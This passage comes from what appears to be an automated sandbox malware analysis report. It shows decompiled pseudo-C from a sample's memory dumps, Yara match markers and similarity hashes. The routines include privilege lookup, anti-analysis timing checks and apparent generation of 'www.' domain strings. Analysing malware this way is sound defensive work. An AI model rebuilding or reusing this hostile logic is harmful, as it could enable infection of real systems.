                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008E07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 008DFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520658018.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                    • Associated: 00000005.00000002.520651238.00000000008C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520733640.00000000009B0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520745735.00000000009C0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520755567.00000000009C4000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520772990.00000000009C7000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520782564.00000000009D0000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000005.00000002.520822745.0000000000A30000.00000040.00000001.sdmp Download File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_8c0000_vbc.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004088E0, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E004088E0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A110( &_v284, 0x104);
						E0041A780( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                    0x004088eb
                                                    0x004088f3
                                                    0x004088f5
                                                    0x004088fa
                                                    0x004088ff
                                                    0x00408912
                                                    0x00408917
                                                    0x00408920
                                                    0x0040892c
                                                    0x0040893f
                                                    0x00408944
                                                    0x00408947
                                                    0x00408950
                                                    0x00408962
                                                    0x00408967
                                                    0x0040896c
                                                    0x00000000
                                                    0x00000000
                                                    0x0040896e
                                                    0x00408972
                                                    0x00000000
                                                    0x00000000
                                                    0x00408974
                                                    0x00000000
                                                    0x00408972
                                                    0x00408976
                                                    0x00408979
                                                    0x0040897f
                                                    0x00408981
                                                    0x0040898c
                                                    0x00408991
                                                    0x00408994
                                                    0x004089a1
                                                    0x004089ac
                                                    0x004089ae
                                                    0x004089b4
                                                    0x004089b8
                                                    0x004089bb
                                                    0x004089bb
                                                    0x004089c2
                                                    0x004089c5
                                                    0x004089ca
                                                    0x004089d7
                                                    0x00408906
                                                    0x00408906
                                                    0x00408906

                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
                                                    • Instruction ID: b342730474dcc0ac064d0d011e1d56cf5cdba0abec35914909fd77f498fa833d
                                                    • Opcode Fuzzy Hash: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
                                                    • Instruction Fuzzy Hash: 7B21F8B2D4420957CB15E6649E42AFF73AC9B50308F04057FE989A2181F639AB498BA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 9 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                                    C-Code - Quality: 100%
                                                    			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                    0x004188d7
                                                    0x004188e2
                                                    0x004188ed
                                                    0x004188f1

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: F5A
                                                    • API String ID: 1279760036-683449296
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418A53, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 207 418a53-418a56 208 418a58-418a5f 207->208 209 4189dd-418a04 call 4191f0 207->209 213 418a61-418a7a call 4191f0 208->213 214 418ab6-418ad0 call 4191f0 208->214 218 418a7f-418a94 LookupPrivilegeValueW 213->218
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 3dc2804c8d3f560f634078950f3a49578d8e791d7f953987e56eaa330a886b04
                                                    • Instruction ID: 0f8594f11b6001affc0ce341d4f6987dd6900938bc816262d1bd862569b70fbd
                                                    • Opcode Fuzzy Hash: 3dc2804c8d3f560f634078950f3a49578d8e791d7f953987e56eaa330a886b04
                                                    • Instruction Fuzzy Hash: C51170B52402486FDB14EFA9DC85EEB3768EF84354F01855AFD086B242C934E954C7F5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 222 407290-4072da call 41a160 call 41ad40 call 409b50 call 413e60 231 4072dc-4072ee PostThreadMessageW 222->231 232 40730e-407312 222->232 233 4072f0-40730a call 4092b0 231->233 234 40730d 231->234 233->234 234->232
                                                    C-Code - Quality: 82%
                                                    			E00407290(void* __ebx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				void* _t20;
				long _t23;
				void* _t25;
				intOrPtr* _t28;
				void* _t29;
				void* _t33;

				_t33 = __eflags;
				_t20 = __edx;
				_v68 = 0;
				E0041AD40(E0041A160( &_v67, 0, 0x3f), _t20, _t25,  &_v68);
				_t12 = E00409B50(__ebx, _t33, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6, 3);
				_t28 = _t13;
				if(_t28 != 0) {
					_t23 = _a8;
					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t35 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t28(_t23, 0x8003, _t29 + (E004092B0(_t35, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}















                                                    0x00407290
                                                    0x00407290
                                                    0x0040729f
                                                    0x004072ae
                                                    0x004072be
                                                    0x004072ce
                                                    0x004072d3
                                                    0x004072da
                                                    0x004072dd
                                                    0x004072ea
                                                    0x004072ec
                                                    0x004072ee
                                                    0x0040730b
                                                    0x0040730b
                                                    0x00000000
                                                    0x0040730d
                                                    0x00407312

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
                                                    • Instruction ID: 4250000cacc114d134f5be589493d0900fd96f71ac8f672bcf1e10d74895a7a9
                                                    • Opcode Fuzzy Hash: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
                                                    • Instruction Fuzzy Hash: F6018431A8022876E721A6959C03FFF776C5B00B55F04415AFF04BA1C2E6E8790586FA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188F4, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 264 4188f4-418917 call 4191f0 266 41891c-418931 RtlFreeHeap 264->266
                                                    C-Code - Quality: 82%
                                                    			E004188F4(void* __eax, void* __ebx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t14;
				void* _t21;
				char _t25;

				 *0x53b9b92f = _t25;
				asm("arpl [ebx-0x741374ab], cx");
				_t11 = _v0;
				_t5 = _t11 + 0xc74; // 0xc74
				E004191F0(_t21, _v0, _t5,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}







                                                    0x004188f9
                                                    0x004188fe
                                                    0x00418903
                                                    0x0041890f
                                                    0x00418917
                                                    0x0041892d
                                                    0x00418931

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 40e16d1b84d617deca3832357b05040c91571bd3a26d620df365af6c4f8e3855
                                                    • Instruction ID: 5e0cb83e5d5d92db5aa6902efd79b6b48365383cfded167720f4880b0219a777
                                                    • Opcode Fuzzy Hash: 40e16d1b84d617deca3832357b05040c91571bd3a26d620df365af6c4f8e3855
                                                    • Instruction Fuzzy Hash: DCE068B41542C49BEB00FF79C8C089B3BA4FF46214B14859EE88847203C131D459CB70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 267 418900-418916 268 41891c-418931 RtlFreeHeap 267->268 269 418917 call 4191f0 267->269 269->268
                                                    C-Code - Quality: 100%
                                                    			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x0041890f
                                                    0x00418917
                                                    0x0041892d
                                                    0x00418931

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 270 418a60-418a79 271 418a7f-418a94 LookupPrivilegeValueW 270->271 272 418a7a call 4191f0 270->272 272->271
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418933, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 37%
                                                    			E00418933(intOrPtr _a4, int _a8) {
				void* _t12;
				intOrPtr _t13;
				void* _t18;

				asm("das");
				asm("cli");
				 *((intOrPtr*)(_t12 + 0x2f)) = _t13;
				asm("cdq");
				asm("aas");
				_t9 = _a4;
				E004191F0(_t18, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}






                                                    0x00418933
                                                    0x00418934
                                                    0x00418935
                                                    0x00418938
                                                    0x0041893b
                                                    0x00418943
                                                    0x0041895a
                                                    0x00418968

                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: f68a12b1ae08bc18d2daaa53a8749b1a1e7c0694c607ca03d50669b30071d059
                                                    • Instruction ID: 566a17abb27ea258133f2eb49586a29f50253f7432eb50924bb539fdf443aa0a
                                                    • Opcode Fuzzy Hash: f68a12b1ae08bc18d2daaa53a8749b1a1e7c0694c607ca03d50669b30071d059
                                                    • Instruction Fuzzy Hash: 2EE046B1A00254BBD620DB988C99FC73BA89F48640F1185A8BD496B292C571EA0586A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x00418943
                                                    0x0041895a
                                                    0x00418968

                                                    APIs
                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 004162F6, Relevance: 4.0, Strings: 3, Instructions: 279COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 89%
                                                    			E004162F6(char __eax, void* __edi) {
				signed char _t122;
				signed char _t126;
				void* _t129;
				signed int _t134;
				void* _t138;
				void* _t146;
				intOrPtr _t149;
				void* _t153;
				intOrPtr _t190;
				char _t194;
				void* _t220;
				void* _t249;
				char _t252;
				intOrPtr _t253;
				void* _t256;
				void* _t259;
				void* _t262;

				_t119 = __eax;
				if(__edi != 1) {
					while(1) {
						L7:
						__eflags = _t119;
						if(_t119 != 0) {
							 *((char*)(_t256 + _t252 - 0x10)) = _t119;
							_t252 = _t252 + 1;
							__eflags = _t252;
						}
						while(1) {
							L9:
							__eflags = _t252 - 8;
							if(__eflags >= 0) {
								break;
							}
							_push(0x92);
							 *((intOrPtr*)(_t220 + 0x53)) =  *((intOrPtr*)(_t220 + 0x53)) + _t194;
							_t119 = E004092B0(__eflags);
							_t259 = _t259 + 8;
							_t194 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t256 + _t194 - 0x10));
								if(_t119 ==  *((intOrPtr*)(_t256 + _t194 - 0x10))) {
									goto L9;
								}
								_t194 = _t194 + 1;
								__eflags = _t194 - _t252;
								if(_t194 <= _t252) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
						}
						_t7 = _t256 - 0x97; // 0x71f7e8fe
						 *((intOrPtr*)(_t256 - 8)) = 0x2e777777;
						 *((char*)(_t256 - 4)) = 0;
						 *((short*)(_t256 - 3)) = 0;
						 *((char*)(_t256 - 1)) = 0;
						 *((char*)(_t256 - 0x98)) = 0;
						E0041A160(_t7, 0, 0x3f);
						_t122 = E004092B0(__eflags, 2, 5);
						_t13 = _t256 - 0x98; // 0x71f7e8fd
						E0041AA50(_t13, _t122 & 0x000000ff);
						_t14 = _t256 - 0x98; // 0x71f7e8fd
						 *((char*)(_t256 + E0041A3B0(_t14) - 0x98)) = 0x3d;
						_t126 = E004092B0(__eflags, 4, 0x10);
						_t17 = _t256 - 0x98; // 0x71f7e8fd
						_t19 = E0041A3B0(_t17) - 0x98; // 0x71f7e8fd
						_t129 = E0041AA50(_t256 + _t19, _t126 & 0x000000ff);
						_t20 = _t256 + 8; // 0x2e777777
						_t253 =  *_t20;
						_t190 = 0;
						_t262 = _t259 + 0x34;
						 *((intOrPtr*)(_t256 - 0x14)) = 0;
						_t249 = 0;
						do {
							__eflags =  *((intOrPtr*)(_t253 + 0x1170)) - _t190;
							if( *((intOrPtr*)(_t253 + 0x1170)) != _t190) {
								_t23 = _t256 - 0x58; // 0x71f7e93d
								E0041A110(_t23, 0x2e);
								_t24 = _t256 - 0x306; // 0x71f7e68f
								 *((short*)(_t256 - 0x308)) = 0;
								E0041A160(_t24, 0, 0x206);
								E0041A110( *((intOrPtr*)(_t253 + 0x14a4)) + _t249, 0x388);
								_t134 = E0041A6D0();
								_t28 = _t190 - 1; // -1
								 *( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x40) = _t134 * _t28 & 0x00000001;
								_t31 = _t256 - 0x98; // 0x71f7e8fd
								_t138 = E0041A3B0(_t31);
								_t33 = _t256 - 0x98; // 0x71f7e8fd
								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x87, _t33, _t138);
								_t36 = _t256 - 8; // 0x2e777777
								_t37 = _t256 - 0x58; // 0x71f7e93d
								E0041A0E0(_t37, _t36, 4);
								_t40 = _t256 - 0x58; // 0x71f7e93d
								_t42 = E0041A3B0(_t40) - 0x58; // 0x71f7e93d
								E00409E10(_t190, _t253, __eflags, _t253, _t256 + _t42,  *(_t256 + _t190 - 0x10) & 0x000000ff);
								_t43 = _t256 - 0x58; // 0x71f7e93d
								_t146 = E0041A3B0(_t43);
								_t45 = _t256 - 0x58; // 0x71f7e93d
								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249, _t45, _t146);
								_t46 = _t256 - 0x58; // 0x71f7e93d
								_t149 = E0041A3B0(_t46);
								_t192 = _t253 + 0xe90;
								_t48 = _t256 - 0x58; // 0x71f7e93d
								 *((intOrPtr*)(_t256 - 0x18)) = _t149;
								E0041A4E0(_t48, _t253 + 0xe90, 0);
								_t50 = _t256 - 0x100; // 0x71f7e895
								E00408C50(_t50);
								_t51 = _t256 - 0x58; // 0x71f7e93d
								_t153 = E0041A3B0(_t51);
								_t52 = _t256 - 0x58; // 0x71f7e93d
								_t53 = _t256 - 0x100; // 0x71f7e895
								E004099D0(_t53, _t52, _t153);
								_t54 = _t256 - 0x100; // 0x71f7e895
								E004099A0(_t54);
								_t56 = _t256 - 0x100; // 0x71f7e895
								E0041A0E0( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x72, _t56, 0x14);
								 *((char*)(_t256 +  *((intOrPtr*)(_t256 - 0x18)) - 0x58)) = 0;
								_t63 = _t256 - 0x308; // 0x71f7e68d
								 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x4c)) = 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t253 + 0x14a4)) + _t249 + 0x50)) = 1;
								E00409EA0(_t253 + 0xe90, _t253, _t253, _t63, 0x46, 1, 4);
								_t70 = _t256 - 0x308; // 0x71f7e68d
